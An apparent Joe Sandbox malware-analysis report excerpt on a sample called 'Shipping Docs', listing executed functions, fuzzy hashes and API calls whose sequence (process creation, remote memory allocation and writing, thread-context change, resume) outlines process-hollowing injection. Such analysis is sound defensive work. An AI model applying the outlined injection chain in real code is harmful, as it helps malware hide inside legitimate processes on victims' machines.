Source File: 00000000.00000002.1231639994.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7330000_Shipping Docs.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: fa89ca86d7ff170b9d7be7d08a6cdc08e959f2889a4dba73761c20b6ac859dde
Instruction ID: 2333eaf26ab7832c5dfba9821121ee0c78d5d8f5832a8aa3319f7faa6a8d9b5d
Opcode Fuzzy Hash: fa89ca86d7ff170b9d7be7d08a6cdc08e959f2889a4dba73761c20b6ac859dde
Instruction Fuzzy Hash: 6D914CB1D00319DFEB24DFA8C841BEDBBB2BF48314F158169E809A7250DB759985CF92

Uniqueness

Uniqueness Score: -1.00%

Function 015BADA8 Relevance: 1.7, APIs: 1, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 015BAFFE

Memory Dump Source

Source File: 00000000.00000002.1226380367.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15b0000_Shipping Docs.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 31f5b1a4e55aab12425e18e67e03511ad3008fc4fca1a3504f7cfe54868991ef
Instruction ID: d3161ecca587559406aaa6d171465ae16dd0a85ce4fa58283037e8ee052a0487
Opcode Fuzzy Hash: 31f5b1a4e55aab12425e18e67e03511ad3008fc4fca1a3504f7cfe54868991ef
Instruction Fuzzy Hash: 77714A70A00B098FE724DF29D49579ABBF1FF88304F00892ED49ADBA50D775E849CB91

Uniqueness

Uniqueness Score: -1.00%

Function 015B44B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 015B59C9

Memory Dump Source

Source File: 00000000.00000002.1226380367.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15b0000_Shipping Docs.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 56e46eeb5ceb17b840aa0983a27b3875b527a4ea47ffb248448428d02837b1c6
Instruction ID: f155cf8765c922c2fae4767c01057bccf3d3e5bcae7154f5a2a3cc0995c25ce5
Opcode Fuzzy Hash: 56e46eeb5ceb17b840aa0983a27b3875b527a4ea47ffb248448428d02837b1c6
Instruction Fuzzy Hash: 5841C170C00719CBEB28DFAAC8847CDBBB5BF49304F20846AD509AB251DBB55945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 015B590D Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 015B59C9

Memory Dump Source

Source File: 00000000.00000002.1226380367.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15b0000_Shipping Docs.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 60ed7fe25f9a46f6c8490f58990be0dfcf834d055aa7c457d4e0b70a17588b99
Instruction ID: 8932c47523988ae9f1add6890b52fc0ca058d342df6d0288f26b8229399cece6
Opcode Fuzzy Hash: 60ed7fe25f9a46f6c8490f58990be0dfcf834d055aa7c457d4e0b70a17588b99
Instruction Fuzzy Hash: 0041D271C00719CFEB28DFA9C8847CDBBB5BF49304F20846AD519AB251DBB5594ACF50

Uniqueness

Uniqueness Score: -1.00%

Function 015BD751 Relevance: 1.6, APIs: 1, Instructions: 86
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015BD717

Memory Dump Source

Source File: 00000000.00000002.1226380367.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15b0000_Shipping Docs.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: e2196a8c7c801f2f93a4e960b69d88a4e6e15fd90c94cdf3cda9aa386a819c62
Instruction ID: 4624435c391edab235f1e64e2cd4c10015a592742eaf80ab0092fe37052b7ede
Opcode Fuzzy Hash: e2196a8c7c801f2f93a4e960b69d88a4e6e15fd90c94cdf3cda9aa386a819c62
Instruction Fuzzy Hash: C4316E74A403889FFB049F60E4567697BBAF7C4350F518939EA218F3C5CBB45855CB10

Uniqueness

Uniqueness Score: -1.00%

Function 07335AE0 Relevance: 1.6, APIs: 1, Instructions: 70
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07335B78

Memory Dump Source

Source File: 00000000.00000002.1231639994.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7330000_Shipping Docs.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 81df468cf5807e0b8ab8dea0a4922fef3ec9564b4e8b3947fe2183463ac946b7
Instruction ID: 8db3d88acb55ac59ab58fadaaee6f33cbcf8ba21b7bdf61ff3b7f41b25cb35b3
Opcode Fuzzy Hash: 81df468cf5807e0b8ab8dea0a4922fef3ec9564b4e8b3947fe2183463ac946b7
Instruction Fuzzy Hash: EB2113B6900349DFDB14CFA9C981BEEBBF1FF48310F10842AE919A7240D7799954CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 07335AE8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07335B78

Memory Dump Source

Source File: 00000000.00000002.1231639994.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7330000_Shipping Docs.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: d0ce82a77e50ba9f82d2e5e77e5ab59e375699e098583d93dd00a6160f4eea81
Instruction ID: 2216df934e2a1e7c459f67fd82612ea9c83dd4184e51b1f1362e7d0fc0544cef
Opcode Fuzzy Hash: d0ce82a77e50ba9f82d2e5e77e5ab59e375699e098583d93dd00a6160f4eea81
Instruction Fuzzy Hash: 7B2125B5900349DFDB14CFAAC881BEEBBF5FF48310F10842AE919A7240C7799950CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 07335BD0 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07335C58

Memory Dump Source

Source File: 00000000.00000002.1231639994.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7330000_Shipping Docs.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: cf152f5fbd69be8abd5eadfbd03b085173a102fc38b87a6005b413a726aeddb7
Instruction ID: 2bbd5192996fbc9a45212b816dfe7f178b6bafdea9a7a63ca6c88dd1579845d3
Opcode Fuzzy Hash: cf152f5fbd69be8abd5eadfbd03b085173a102fc38b87a6005b413a726aeddb7
Instruction Fuzzy Hash: BC2123B2C003099FDB10CFAAC981BEEBBF1FF48310F14882AE958A7240C77895418B60

Uniqueness

Uniqueness Score: -1.00%

Function 073350D8 Relevance: 1.6, APIs: 1, Instructions: 64
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0733515E

Memory Dump Source

Source File: 00000000.00000002.1231639994.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7330000_Shipping Docs.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 671c0de90534f678b576f512541c206b6fac1c7b002b9155271eddcd5103feed
Instruction ID: d496d457c9e9edc6b57d49e39c60476da6e8d1dfe2d0e9a7d50dbb3f74f5dd7c
Opcode Fuzzy Hash: 671c0de90534f678b576f512541c206b6fac1c7b002b9155271eddcd5103feed
Instruction Fuzzy Hash: 4F2138B5D003098FEB14CFAAC5857EEBBF4EF48210F14842AD459AB341DB789945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07335BD8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07335C58

Memory Dump Source

Source File: 00000000.00000002.1231639994.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7330000_Shipping Docs.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: cc6d1388a34f3d9bc98fb3f5afd5b8cb928189fefcec9bec7a800939c7455ebf
Instruction ID: 4d6f52a9c0fe8051b3c2e5891a7b371750941ec879fbba0caaf33181c1f3368c
Opcode Fuzzy Hash: cc6d1388a34f3d9bc98fb3f5afd5b8cb928189fefcec9bec7a800939c7455ebf
Instruction Fuzzy Hash: 662125B1C003499FDB14DFAAC880BEEBBF5FF48310F14842AE959A7240C7799940CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 073350E0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0733515E

Memory Dump Source

Source File: 00000000.00000002.1231639994.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7330000_Shipping Docs.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 250b1b498883b33707bc230c281a4635d8565a6faa60d42de5f52255fd5855d8
Instruction ID: 86cfcba725dfe116436db1ac6294400e86491dcf18ba44249f16ece408f8538d
Opcode Fuzzy Hash: 250b1b498883b33707bc230c281a4635d8565a6faa60d42de5f52255fd5855d8
Instruction Fuzzy Hash: 792138B1D003098FEB24DFAAC4857EEBBF4EF48210F14842AD459A7240CB789945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 015BD690 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015BD717

Memory Dump Source

Source File: 00000000.00000002.1226380367.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15b0000_Shipping Docs.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b25246257d6ab5ecc64a9e248c72709df5d6f48fd85d246f6868abdd4d817f53
Instruction ID: 29d430889e35e2d937c0b9e40d5d3fe38039e769e41abd77e057154b8d9c57d4
Opcode Fuzzy Hash: b25246257d6ab5ecc64a9e248c72709df5d6f48fd85d246f6868abdd4d817f53
Instruction Fuzzy Hash: D321E3B5D00248DFDB10CF9AD484ADEBBF4FB48310F14841AE918A7350C378A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 015BD689 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015BD717

Memory Dump Source

Source File: 00000000.00000002.1226380367.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15b0000_Shipping Docs.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: af05eae3fafd642d212fbe6aa2c1aabee63d463d9a4bf1e39ea2e3b5be76b255
Instruction ID: 02bad3fd8ea87e8bbf107d0dd1c517c346d3baacd2f8cd60f91a915d0d7a5806
Opcode Fuzzy Hash: af05eae3fafd642d212fbe6aa2c1aabee63d463d9a4bf1e39ea2e3b5be76b255
Instruction Fuzzy Hash: F721E0B5D00248DFDB10CFAAD584BDEBBF5FB48314F24841AE918A7250C378A944CF65

Uniqueness

Uniqueness Score: -1.00%

Function 015BA130 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,015BB079,00000800,00000000,00000000), ref: 015BB28A

Memory Dump Source

Source File: 00000000.00000002.1226380367.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15b0000_Shipping Docs.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b869ce3ef8bbbc55b4631daa8e4b9b23679f0dc3cfe80b611296abb70f3a7694
Instruction ID: 9b2488606c07353eebe6fe8fd2b03084f721a69b4ae8bcf6e1935ac5eadb785b
Opcode Fuzzy Hash: b869ce3ef8bbbc55b4631daa8e4b9b23679f0dc3cfe80b611296abb70f3a7694
Instruction Fuzzy Hash: 2C1103B6C003489FDB24CF9AC484BDEFBF4EB48310F10842AE519AB200C3B5A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07335A20 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07335A96

Memory Dump Source

Source File: 00000000.00000002.1231639994.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7330000_Shipping Docs.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: baac9ec45c820a85456c5d4df25fbb39afe1dfa6053f00b62435916c8cf4576d
Instruction ID: 1e5b1eff7dc79b98ea0ffc9345afd1549f51053646ad0ec80081aeffc5578e7b
Opcode Fuzzy Hash: baac9ec45c820a85456c5d4df25fbb39afe1dfa6053f00b62435916c8cf4576d
Instruction Fuzzy Hash: A41144B6800349DFEB24DFA9C844BEEBBF5EF48310F14881AE529A7250C7799540DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 07335A28 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07335A96

Memory Dump Source

Source File: 00000000.00000002.1231639994.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7330000_Shipping Docs.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: cfed75d3de89a8c0992a84da0af615c5249e99ecb7145f8b4a3f688d5fed2de6
Instruction ID: 7f84d4005a0b49e1f108d3ae044e62ca1d5176cdc93624c6fd1ac27e79149e4f
Opcode Fuzzy Hash: cfed75d3de89a8c0992a84da0af615c5249e99ecb7145f8b4a3f688d5fed2de6
Instruction Fuzzy Hash: 9C1167728003499FDB24DFAAC844BDFBBF5EF48310F108819E519A7250CB759540CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 015BB218 Relevance: 1.6, APIs: 1, Instructions: 51libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,015BB079,00000800,00000000,00000000), ref: 015BB28A

Memory Dump Source

Source File: 00000000.00000002.1226380367.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15b0000_Shipping Docs.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e217cd651f1463482af523b4ca6459094ead94cf61fc390bf51d8dd64a995d1b
Instruction ID: 1b62abfa37e70ba370acf45ab694921c13e3f6f6d6dfae808d2dc81662658592
Opcode Fuzzy Hash: e217cd651f1463482af523b4ca6459094ead94cf61fc390bf51d8dd64a995d1b
Instruction Fuzzy Hash: 2F11DDB6C00209CFDB24CFAAC584BDEFBF5BB48310F10852AD519AB650C3B9A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07335030 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 07335092

Memory Dump Source

Source File: 00000000.00000002.1231639994.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7330000_Shipping Docs.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: cde2e4e069f6fedcf737209969e895f9fe235ba17bab810369f9bba90208a647
Instruction ID: c8da324b702e2be6bf7c7f26db47370d7edd7a77a637dea18b65784758707750
Opcode Fuzzy Hash: cde2e4e069f6fedcf737209969e895f9fe235ba17bab810369f9bba90208a647
Instruction Fuzzy Hash: 85113AB1D003488FDB24DFAAC4457DEFBF5EF48210F148419D519A7240DB79A544CF95

Uniqueness

Uniqueness Score: -1.00%

Function 07335029 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 07335092

Memory Dump Source

Source File: 00000000.00000002.1231639994.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7330000_Shipping Docs.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 1459c8bf471a704d4a6d7eee20343f14526aa81aeddff526f400c6f158985d35
Instruction ID: 3ba5748e172cc0ad7608cd462de36df30618f8e2d08464d90c48d6b333df560e
Opcode Fuzzy Hash: 1459c8bf471a704d4a6d7eee20343f14526aa81aeddff526f400c6f158985d35
Instruction Fuzzy Hash: 501158B5D00349CFEB24DFAAC4457EEBBF4EF48210F14881AC519AB240DB799544CF95

Uniqueness

Uniqueness Score: -1.00%

Function 07335E6C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0733A4AD

Memory Dump Source

Source File: 00000000.00000002.1231639994.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7330000_Shipping Docs.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 0157b6948562d8273647731dd019abb4e4a3196be0280fc4c908467916c33bd2
Instruction ID: 09592b95c97a747019686861deb20443026018b3253f6068f5f9056b98d579da
Opcode Fuzzy Hash: 0157b6948562d8273647731dd019abb4e4a3196be0280fc4c908467916c33bd2
Instruction Fuzzy Hash: C411F2B5800359DFEB20DF9AC489BDEBBF8EB48320F108459E558A7310D375A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 015BAF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 015BAFFE

Memory Dump Source

Source File: 00000000.00000002.1226380367.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15b0000_Shipping Docs.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 4108d51122a932c7775f35ffcee8fc00404717d15b4c308d5413547f88b8714a
Instruction ID: d7f0f8ffcae8490b7e13569df5f611c794afe680395467e69deec91f610700df
Opcode Fuzzy Hash: 4108d51122a932c7775f35ffcee8fc00404717d15b4c308d5413547f88b8714a
Instruction Fuzzy Hash: 6F1110B6C003498FDB24CF9AC484BDEFBF4EB88214F10841AD529AB210D379A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0733A44B Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0733A4AD

Memory Dump Source

Source File: 00000000.00000002.1231639994.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7330000_Shipping Docs.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 3f60008387ab89df10ca3a14764a87dae55c7f9386148316995d930435759009
Instruction ID: f093e092cd91cfd2c17242ba3e3c737b8b54e535a315d9de27dcfcf065c747d3
Opcode Fuzzy Hash: 3f60008387ab89df10ca3a14764a87dae55c7f9386148316995d930435759009
Instruction Fuzzy Hash: 3111F2B58003599FEB20DF9AD885BDEBBF8EB48320F108419E558A7300C375A544CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0126D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1225894115.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_126d000_Shipping Docs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f391fbd3e850a117807fdb521fadc7b72a95818ccc0c8812feb644fe86690d1
Instruction ID: 2d39da6994716dfb9753375d32979ebd937e2a5845d27baaeba5f61e2cdc63d6
Opcode Fuzzy Hash: 0f391fbd3e850a117807fdb521fadc7b72a95818ccc0c8812feb644fe86690d1
Instruction Fuzzy Hash: 6F21487661024CDFDB15DF54D9C0B56BB69FB88314F20C16CE9490F296C336E896CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 0127D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1225953178.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_127d000_Shipping Docs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93e125a77403c1b2a736872f3a9c599715f198d75e4040d67a9cf6f1ea1be2cd
Instruction ID: 962103164ee46c59a2c655daf7ce1fd9792b2142dea6dfb37e1a023305df3892
Opcode Fuzzy Hash: 93e125a77403c1b2a736872f3a9c599715f198d75e4040d67a9cf6f1ea1be2cd
Instruction Fuzzy Hash: 7A210075614208EFDB16DF64D980B27BB61EF84314F20C56DE90A0B292C376D807CA62

Uniqueness

Uniqueness Score: -1.00%

Function 0127D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1225953178.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_127d000_Shipping Docs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a636c35b337f732b2861d8a029934b4401f1d046425cb8f1427df6e235fa38f
Instruction ID: 022db83783cb2be6fa361bcdb6401f9babe0da4ff47b05be8a4a9c1400d1af6c
Opcode Fuzzy Hash: 7a636c35b337f732b2861d8a029934b4401f1d046425cb8f1427df6e235fa38f
Instruction Fuzzy Hash: DF219A755093848FCB03CF24D990712BF71AF46314F28C5EAD9498B6A3C33A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0126D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1225894115.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_126d000_Shipping Docs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
Instruction ID: 2a37b4ef260ee310cdd6121353056d3e2caf087b190ce9363d51b77dac646249
Opcode Fuzzy Hash: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
Instruction Fuzzy Hash: 791121B2500288DFCB02CF44D5C0B56BF71FB84320F24C2A9D9490B697C33AE856CBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 07333568 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1231639994.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7330000_Shipping Docs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 206401273e458cc43961796b343c54a40604e6f4ea0b4a6d27094be9c50c3d38
Instruction ID: 08f5c0ae3e5d55486f514c65371ff86f8d31e10fdef240d1c186fa89cc29572b
Opcode Fuzzy Hash: 206401273e458cc43961796b343c54a40604e6f4ea0b4a6d27094be9c50c3d38
Instruction Fuzzy Hash: 55E11EB4E002598FDB24DF99C580AAEFBB2FF89305F24C159D819AB355D7309941CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 073355F0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1231639994.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7330000_Shipping Docs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3843bc3e88efbdf819dfa19eca773d1342b6c1d6b518210f23db774c2840356c
Instruction ID: 52aa59aa73408aef33127e1f41f875b33e31b41db96e9f92d678ae845e872431
Opcode Fuzzy Hash: 3843bc3e88efbdf819dfa19eca773d1342b6c1d6b518210f23db774c2840356c
Instruction Fuzzy Hash: 49E11DB4E102598FDB24DFA9C580AAEFBF2FF89305F248169D819AB355D7309941CF60

Uniqueness

Uniqueness Score: -1.00%

Function 07333130 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1231639994.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7330000_Shipping Docs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 747b2357a2e32c643b0eaad96c373eac0d74ec15bde97b87cb7b7a1be023120a
Instruction ID: 78ba2a80d385714e32839d9aec86f87bd26df1ab48214cb6016f9b35240aefcb
Opcode Fuzzy Hash: 747b2357a2e32c643b0eaad96c373eac0d74ec15bde97b87cb7b7a1be023120a
Instruction Fuzzy Hash: F5E1FCB4E002598FDB24DF99C580AAEFBB2FF89305F24C159D818AB355D731A941CF60

Uniqueness

Uniqueness Score: -1.00%

Function 073351B8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1231639994.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7330000_Shipping Docs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8107b01448b82d2c778837e109b65d7f79bd91092c360cdc371070ec9b4e5026
Instruction ID: 4705b34e60be602b49f867abe4b4e53a417122183ad6e9f76cd39b06e0e5ac69
Opcode Fuzzy Hash: 8107b01448b82d2c778837e109b65d7f79bd91092c360cdc371070ec9b4e5026
Instruction Fuzzy Hash: 44E110B4E002598FDB24DFA9C580AAEFBF2FF89305F248159D819AB355D731A941CF60

Uniqueness

Uniqueness Score: -1.00%

Function 073339A0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1231639994.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7330000_Shipping Docs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 012285dfeb60aaf0c7083c793de72d635d14dc628722f506e4175eb2e81b9622
Instruction ID: 389b8bdd0b2d2c74e94493b2b6c51eeff942eb6da7a00eac696843a1bc3a2246
Opcode Fuzzy Hash: 012285dfeb60aaf0c7083c793de72d635d14dc628722f506e4175eb2e81b9622
Instruction Fuzzy Hash: D8E10CB4E002598FDB24DF99C590AAEFBB2FF89305F24C169D858AB355D7309941CF60

Uniqueness

Uniqueness Score: -1.00%

Function 015BD5BC Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1226380367.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15b0000_Shipping Docs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 861f2ae666271b33334464bf13c69c4eb95c349b3ddde8a702fbab01c949daa4
Instruction ID: fd93b46494856cb1b7115270a7a62bf92f71d36f435961276678903156eb39cd
Opcode Fuzzy Hash: 861f2ae666271b33334464bf13c69c4eb95c349b3ddde8a702fbab01c949daa4
Instruction Fuzzy Hash: 52A13C36E0021A8FCF05DFB8C8845DEBBB2FF85304B15856AE905AF265DB71E955CB40

Uniqueness

Uniqueness Score: -1.00%

